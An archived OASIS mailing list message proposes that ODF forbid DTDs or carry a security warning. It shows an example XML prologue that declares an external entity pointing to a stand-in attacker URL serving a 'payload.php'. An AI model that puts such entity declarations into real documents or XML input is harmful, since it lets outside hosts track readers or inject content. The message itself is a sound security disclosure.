OASIS Mailing List ArchivesView the OASIS mailing list archive below
or browse/search using MarkMail.


Help: OASIS Mailing Lists Help | MarkMail Help

office-comment message

[Date Prev] | [Thread Prev] | [Thread Next] | [Date Next] -- [Date Index] | [Thread Index] | [List Home]

Subject: ODF security hazard? (ODF all versions)

Dear all,

Is an XML document starting thus, a conformant ODF document:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE office:document-content [
<!ENTITY l33thakz SYSTEM "http://my-evil-hack-site.net/payload.php";>
<office:document-content xmlns:office= ... (etc)


If the ODF processor is a conformant XML processor, then it may expand
that external entity reference. 

This is obviously a security risk enabling tracking of users of the
document, modification of the content, or certain more serious kinds of
attack. These vulnerabilities are well known and documented in section
10 of RFC 3023.

I believe ODF should be modified to forbid the use of DTDs (as has been
done in OOXML), as casual office application users cannot be expected to
be aware of the security hazards implicit in this XML feature, or that
every ODF document of unknown origin is a potential security risk.

If not, the text of ODF 1.2 should be amended to include a prominent
security warning and a pointer to RFC 3023.

The text of previous versions of ODF should be modified to include such
a security warning.

I am *extremely* interested in this topic as I am collected use cases
for a new validation language which can be used to constrain the infoset
features of XML documents. Such a language could clearly be useful to
declaring that DTDs are not permitted, and be of use to future versions
of ODF/OOXML if they chose that route ...

Thoughts please ...

- Alex.

[Date Prev] | [Thread Prev] | [Thread Next] | [Date Next] -- [Date Index] | [Thread Index] | [List Home]